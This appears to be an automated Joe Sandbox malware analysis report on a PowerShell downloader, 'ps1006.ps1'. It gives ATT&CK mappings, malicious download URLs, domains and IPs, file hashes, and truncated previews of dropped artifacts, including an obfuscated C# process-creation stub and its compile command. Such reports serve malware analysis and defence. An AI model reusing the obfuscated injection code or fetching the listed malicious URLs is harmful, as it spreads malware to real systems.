    Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
    Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
    Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (21); Process Injection (11); Obfuscated Files or Information (1); DLL Side-Loading (1); Steganography
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
    Discovery: Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (12)
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
    Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
    Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (3); Fallback Channels; Multiband Communication
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
    Antivirus detection (submitted sample)
    Source | Detection | Scanner | Label
    ps1006.ps1 | 63% | ReversingLabs | Script-PowerShell.Downloader.Donoff
    ps1006.ps1 | 100% | Avira | TR/PowerShell.Gen
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches

    Antivirus detection (URLs)
    Source | Detection | Scanner | Label
    http://bemnyc.com | 0% | Avira URL Cloud | safe
    https://status.squarespace.com | 0% | Avira URL Cloud | safe
    http://fenett2018.com | 100% | Avira URL Cloud | malware
    http://eastend.jp | 100% | Avira URL Cloud | malware
    http://www.microsoft.cy | 0% | Avira URL Cloud | safe
    http://eastend.jp/bl5kfa | 100% | Avira URL Cloud | malware
    http://yourmother4cancer.info | 100% | Avira URL Cloud | malware
    http://bemnyc.com/u8erijeq | 100% | Avira URL Cloud | malware
    http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23 | 100% | Avira URL Cloud | malware
    http://habarimoto24.com | 0% | Avira URL Cloud | safe
    http://fenett2018.com/dobgx | 100% | Avira URL Cloud | malware
    http://abakus-biuro.net | 0% | Avira URL Cloud | safe
    http://habarimoto24.com/nh | 0% | Avira URL Cloud | safe
    http://abakus-biuro.net//a9zqemm | 100% | Avira URL Cloud | malware
    Domains
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    eastend.jp | 162.43.104.133 | true | false | - | unknown
    bemnyc.com | 198.185.159.145 | true | false | - | unknown
    fenett2018.com | unknown | unknown | false | - | unknown
    yourmother4cancer.info | unknown | unknown | false | - | unknown
    habarimoto24.com | unknown | unknown | false | - | unknown
    abakus-biuro.net | unknown | unknown | false | - | unknown
    Contacted URLs
    Name | Malicious | Antivirus Detection | Reputation
    http://bemnyc.com/u8erijeq | false | Avira URL Cloud: malware | unknown
    http://eastend.jp/bl5kfa | false | Avira URL Cloud: malware | unknown
    URLs found in memory or binary data
    Name | Source | Malicious | Antivirus Detection | Reputation
    http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://www.microsoft.cy | powershell.exe, 00000000.00000002.2810364185.000001B2B49E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://yourmother4cancer.info | powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://go.micro | powershell.exe, 00000000.00000002.2665414648.000001B29DDFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2665414648.000001B29DC69000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://status.squarespace.com | powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23 | powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://contoso.com/License | powershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://contoso.com/Icon | powershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://aka.ms/winsvr-2022-pshelpX | powershell.exe, 00000000.00000002.2665414648.000001B29D8EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2665414648.000001B29D8C6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://bemnyc.com | powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.microsoft. | powershell.exe, 00000000.00000002.2810364185.000001B2B49E0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    http://eastend.jp | powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    http://go.micros | powershell.exe, 00000000.00000002.2665414648.000001B29DDFF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://aka.ms/winsvr-202 | powershell.exe, 00000000.00000002.2805114270.000001B2B4410000.00000004.00000020.00020000.00000000.sdmp | false | - | high
    http://fenett2018.com | powershell.exe, 00000000.00000002.2665414648.000001B29C5CD000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://contoso.com/ | powershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.2701923019.000001B2AC251000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://habarimoto24.com | powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://fenett2018.com/dobgx | powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp, ps1006.ps1 | false | Avira URL Cloud: malware | unknown
    http://habarimoto24.com/nh | powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp, ps1006.ps1 | false | Avira URL Cloud: safe | unknown
    https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.2665414648.000001B29C1E1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.2665414648.000001B29C1E1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
    http://abakus-biuro.net//a9zqemm | powershell.exe, 00000000.00000002.2665414648.000001B29C408000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp, ps1006.ps1 | false | Avira URL Cloud: malware | unknown
    http://abakus-biuro.net | powershell.exe, 00000000.00000002.2665414648.000001B29C5DF000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
198.185.159.145 | bemnyc.com | United States | 53831 | SQUARESPACEUS | false
162.43.104.133 | eastend.jp | United States | 11333 | CYBERTRAILSUS | false
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1560748
                                                    Start date and time:2024-11-22 09:21:05 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 5m 0s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:8
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:ps1006.ps1
                                                    Detection:MAL
                                                    Classification:mal96.expl.evad.winPS1@7/14@6/2
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 5
                                                    • Number of non-executed functions: 1
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .ps1
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                    • VT rate limit hit for: ps1006.ps1
Time | Type | Description
03:22:01 | API Interceptor | 33027x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
198.185.159.145 | ps1005.ps1 | malicious | Unknown | bemnyc.com/u8erijeq
198.185.159.145 | Purchase Order #5315262WNH72901-The Sanford Company.pdf | malicious | Unknown | aircormech.com/
198.185.159.145 | firmware.armv7l.elf | malicious | Unknown | 198.185.159.145/
198.185.159.145 | firmware.i586.elf | malicious | Unknown | 198.185.159.145/
198.185.159.145 | eqqjbbjMlt.elf | malicious | Unknown | uwemusic.com/
198.185.159.145 | FXja4SyAYs.exe | malicious | Unknown | familycompany.net/index.php
198.185.159.145 | FXja4SyAYs.exe | malicious | Unknown | familycompany.net/index.php
198.185.159.145 | SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtf | malicious | FormBook | www.wvpbuildingservices.com/bi09/?TJ=j0G4c8K0K&Czrt=lZMivCAdWjEad0YwZ6gLnX1BXgPIjGJJhnqogY0KbyoDqo2C47LZ+Q1xf2o08ygL02QL6A==
198.185.159.145 | BWV4hz5GdR.exe | malicious | Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig | resolvedcx.com/PhpMyAdmin/
198.185.159.145 | MCYq2AqNU0.exe | malicious | Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig | mwpmedia.com/admin/
162.43.104.133 | ps1005.ps1 | malicious | Unknown | eastend.jp/bl5kfa
Match | Associated Sample Name / URL | Detection | Threat Name | Context
eastend.jp | ps1005.ps1 | malicious | Unknown | 162.43.104.133
bemnyc.com | ps1005.ps1 | malicious | Unknown | 198.185.159.145
bemnyc.com | pdf.ps1 | malicious | Unknown | 198.185.159.145
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CYBERTRAILSUS | ps1005.ps1 | malicious | Unknown | 162.43.104.133
CYBERTRAILSUS | IWnUKXop2x.elf | malicious | Mirai, Okiru | 162.43.182.68
CYBERTRAILSUS | la.bot.mipsel.elf | malicious | Unknown | 162.43.62.102
CYBERTRAILSUS | 25XrVZw56S.exe | malicious | Unknown | 162.43.112.11
CYBERTRAILSUS | oUc5lyEzJy.exe | malicious | Unknown | 162.43.112.11
CYBERTRAILSUS | JUHGSyleu7.exe | malicious | Unknown | 162.43.112.11
CYBERTRAILSUS | oUc5lyEzJy.exe | malicious | Unknown | 162.43.112.11
CYBERTRAILSUS | JUHGSyleu7.exe | malicious | Unknown | 162.43.112.11
CYBERTRAILSUS | 4wwi2Lh5W4.exe | malicious | Unknown | 162.43.112.11
CYBERTRAILSUS | Botulismus56.exe | malicious | FormBook, GuLoader | 162.43.104.164
SQUARESPACEUS | ps1005.ps1 | malicious | Unknown | 198.185.159.145
SQUARESPACEUS | https://link.edgepilot.com/s/62feea16/mgkISLmjmE63UVzPYgooJQ?u=https://ameely.com.eg/ | malicious | Unknown | 198.185.159.145
SQUARESPACEUS | https://sawfish-groundhog-d6h6.squarespace.com/ | malicious | Unknown | 198.185.159.177
SQUARESPACEUS | original.eml | malicious | Unknown | 198.185.159.144
SQUARESPACEUS | https://www.canva.com/design/DAGV5ZsI2aM/Y4DbzinsvfGp5Ll4c_oJJQ/view?utm_content=DAGV5ZsI2aM&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | Unknown | 198.185.159.177
SQUARESPACEUS | https://www.canva.com/design/DAGVsvWsNbI/iZzU0BNPZvRGZSXgumDARw/view?utm_content=DAGVsvWsNbI&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | Unknown | 198.185.159.177
SQUARESPACEUS | http://heptagon-olive-l8hr.squarespace.com | malicious | Unknown | 198.185.159.177
SQUARESPACEUS | botnet.x86.elf | malicious | Mirai, Moobot | 142.202.19.72
SQUARESPACEUS | https://accesspage853.ubpages.com/4k5-ffdfg | malicious | Unknown | 198.185.159.177
SQUARESPACEUS | yGktPvplJn.exe | malicious | Pushdo | 198.185.159.144
                                                    No context
                                                    No context
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):61147
                                                    Entropy (8bit):5.077943793919534
                                                    Encrypted:false
                                                    SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHkqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPa
                                                    MD5:95B7548D8D8DDBAB0877BFC7F500503D
                                                    SHA1:894B9735A30AE067FF88622B4F9C8EDF36997F6F
                                                    SHA-256:D6C8E2EF650282C5B78D4CB89DE7FA47D0AC7A3818250101A2418B793D7C4BBA
                                                    SHA-512:B552E36B17A92C584B269C73A9888AC67D19C28326EF39B7F1611CB6756B112BD113A9815EAB3BC6B51A6DBEFE4680C7532DD5D4F4102791BBB2021E4DDD8E54
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1940658735648508
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllul7got/Z:NllUkot
                                                    MD5:71995B6B43EA2A2D49079E9E99E8D184
                                                    SHA1:A55CE57E044A814007D3EE7DCCF1527EF391036A
                                                    SHA-256:FD011C1349ABA970E984930A34129F61F60BF70A92E4E1748C4DCFFA3E22DFBF
                                                    SHA-512:6CFBFC9B41995E53733EDCEC9747C4B7EA800D267145D6A879637CBC2B96E06C1D8CFEE9CDC59A6E57A32AEFE5A941448A029B16F4B2A11EF8CC0F579352509A
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:@...e................................................@..........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1032), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):1035
                                                    Entropy (8bit):4.369231230362479
                                                    Encrypted:false
                                                    SSDEEP:24:JVPHMxi73UnaDa+anvOq89NWEMF90A7Q/:JVPHMxi73fa++1UNWEpf
                                                    MD5:5989018A4C0AD9CC8BC4CC1E5524186C
                                                    SHA1:EC9217244192C5EC96B4AC67982AC05983036569
                                                    SHA-256:F2C563322C4D6A4C8B00946B48E3A59B45D8EC5991D977ACD4514960F8FAB4E5
                                                    SHA-512:2550FB415B2022E3E3D14BE551310C7C6821D8B1AF7854253D8701F5376D720E1F661C0177F24B0F3BFEDF90469064C107D72B1DCAC6EFA355C24DC6AA786975
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:.using System;using System.Diagnostics;using System.Runtime.InteropServices;[StructLayout(LayoutKind.Sequential)]public struct l1Ill1{public IntPtr llI1Il1111;public IntPtr ll11llII111;public uint II11IIIIIIl;public uint Il1lI1;}[StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]public struct l1lll1l{public uint II1l1Il1II;public string I11l1111I;public string lllIIlII;public string l1I1IIllI1I1;public uint I1I1ll11I;public uint lIlII11;public uint II11lIIl11I;public uint lIl1lIl1II11;public uint lIIl1Il;public uint Illl11I1;public uint II1ll1l11;public uint IlIlIl1Illl;public short l11111lI1l;public short lllIllI11I11;public IntPtr I1II1lIII;public IntPtr Il11lI1;public IntPtr ll1IlI;public IntPtr l1l11Il1lll1;};public static class lIlIlI{[DllImport("kernel32.dll",SetLastError=true)]public static extern bool CreateProcess(string llllIIIllIlI,string l1111I1I11I1,IntPtr ll1Il111,IntPtr IIIll11Il1,bool l1Il1lll111,uint IIlIl11l11l,IntPtr Il1I1Il11l1l,string l1l1Illl,ref l1lll
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):369
                                                    Entropy (8bit):5.252407323346915
                                                    Encrypted:false
                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fRQZzxs7+AEszIwkn23fRQE:p37Lvkmb6KRf6ZWZEif6E
                                                    MD5:3F83A7AABB6CC9FFC5D670DB7ED0CD53
                                                    SHA1:6E510D7CD6B2CB3F498EFAE9A495344A6C7F44B3
                                                    SHA-256:7700644B2351DD3F74F8E9F87C2931A30E4D64A56E8BB600B6412495F19F0D78
                                                    SHA-512:1CCC39D854F771630913CF8FB4DF2B483BF20B40EB4CE272B228CF75A75E1DA7FB9D3752DCD3CB16562B9492EABE38B9A19C87DA092007B658C379170DCCD0AE
                                                    Malicious:true
                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.0.cs"
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):4096
                                                    Entropy (8bit):2.997319960845197
                                                    Encrypted:false
                                                    SSDEEP:48:6Y+xOMHQ+7mlodYww4IGjKsxg5D5P2oU7WhjJ23r3W1ul9a3Bq:4fQ+7mlyYww47KCKooIcWPK
                                                    MD5:AB48DC113DE983AFF05124F27D80DAB9
                                                    SHA1:861BE15727579241A2CC192264DB5445A5A0778C
                                                    SHA-256:19188374DC60C7029A942FC4D41D83A935AE90D996F7DE6FF0486C9A53F18EF6
                                                    SHA-512:5E69D04C86B6CCD13A137A3C7942C688465B45F972CAD484729066EFEE9A44D3C05A05ECC7907FA257AD866117454883870D91CBF7C03C4F270FB38873EAA4C9
                                                    Malicious:false
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q@g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P ..\...........................................................BSJB............v4.0.30319......l.......#~..T.......#Strings............#US.........#GUID.......d...#Blob...........W.........%3................................................................=.6...G.6...............".....I....._.....j.................................................&...........N.....Y.....e.....q.....x.......................................................................................
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (448), with CRLF, CR line terminators
                                                    Category:modified
                                                    Size (bytes):869
                                                    Entropy (8bit):5.338525169085235
                                                    Encrypted:false
                                                    SSDEEP:24:KJBId3ka6KRf6+Eif6RKax5DqBVKVrdFAMBJTH:Ckka6C3Eu6K2DcVKdBJj
                                                    MD5:69FBDF20B9E7A76F7AD98E9AD29FECCC
                                                    SHA1:1FC64161108D7D3887759011E4620BC8E9E223FF
                                                    SHA-256:BB9B947F562229A3246CFCC4511C0904AB22EEABBCA68B5E4F842E96E1794C76
                                                    SHA-512:0B24E45377AD8F86F6DBD08BB4A19DE12BAE7F9CF255B2167FD4E9C1F25A77B3352B6F970BB89ABC8034CD573DA998F8ECA3BA5B80BBF40A977EA5F86E6DC492
                                                    Malicious:false
                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3udn0yxz\3udn0yxz.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:MSVC .res
                                                    Category:dropped
                                                    Size (bytes):652
                                                    Entropy (8bit):3.1056694004925953
                                                    Encrypted:false
                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry/ak7YnqqrPN5Dlq5J:+RI+ycuZhN9akSrPNnqX
                                                    MD5:84109075BBBC162669B97FC5DBE70C25
                                                    SHA1:E90EDDDEAB52040292EF37691E1BD5D8F29EB25F
                                                    SHA-256:54D6AFD10713678540F3309730E6F9B7EAFF0887C9053A2758CB91375071183B
                                                    SHA-512:A75259D2453E74851BFD112DAFE352A5939698F9E80FD80A71ABB581E2BAF56CA028666F2E111C20A22DFA7C8C4214D73CCAB651F7AFA75D875B6B1E82ED800E
                                                    Malicious:false
                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.u.d.n.0.y.x.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.u.d.n.0.y.x.z...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Fri Nov 22 09:41:25 2024, 1st section name ".debug$S"
                                                    Category:dropped
                                                    Size (bytes):1332
                                                    Entropy (8bit):4.005637964645039
                                                    Encrypted:false
                                                    SSDEEP:24:HzFzW91+fCjZDfHKwKEsmNwI+ycuZhN9akSrPNnqS2d:DCjdBKhmm1ul9a3BqSG
                                                    MD5:E0DEBA5D8A37E87E9C90020907DF1A88
                                                    SHA1:42CE37C4C7F8C71B78090E51480FBA4E9ECDAFDD
                                                    SHA-256:7E3BE1D25CDDCDA51A3D414A6EA83403B0470892F32C1C98D01D9F96C8B41AFE
                                                    SHA-512:349D2A9AE9624C8054D910360E884EE7142B932E1F1CBB26E130E63DD8861028B76402D9D00C7DD855D112B4499DD422750850BAF1675187F024F1111A7239BB
                                                    Malicious:false
                                                    Preview:L....Q@g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\3udn0yxz\CSCAE9011C6523D4F1EAAD46B3D766D9AF5.TMP..................u...&i......%..........4.......C:\Users\user\AppData\Local\Temp\RES53EF.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.u.d.n.0.y.x.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6221
                                                    Entropy (8bit):3.728488461676678
                                                    Encrypted:false
                                                    SSDEEP:48:epRELlLPr3C4U28oj7ukvhkvklCywzmdZqFzl1sSogZoK5qFzlDsSogZo+1:ESl33CxHoekvhkvCCtCqFzpHRqFzjHJ
                                                    MD5:66017E7A577805DBC8927B01159D3802
                                                    SHA1:3750ACFBB4D116B7FF6051E9A88153295AC318C4
                                                    SHA-256:3063193D4C605930A032E20668078E769801155A3AEF9457627635351CE8AC13
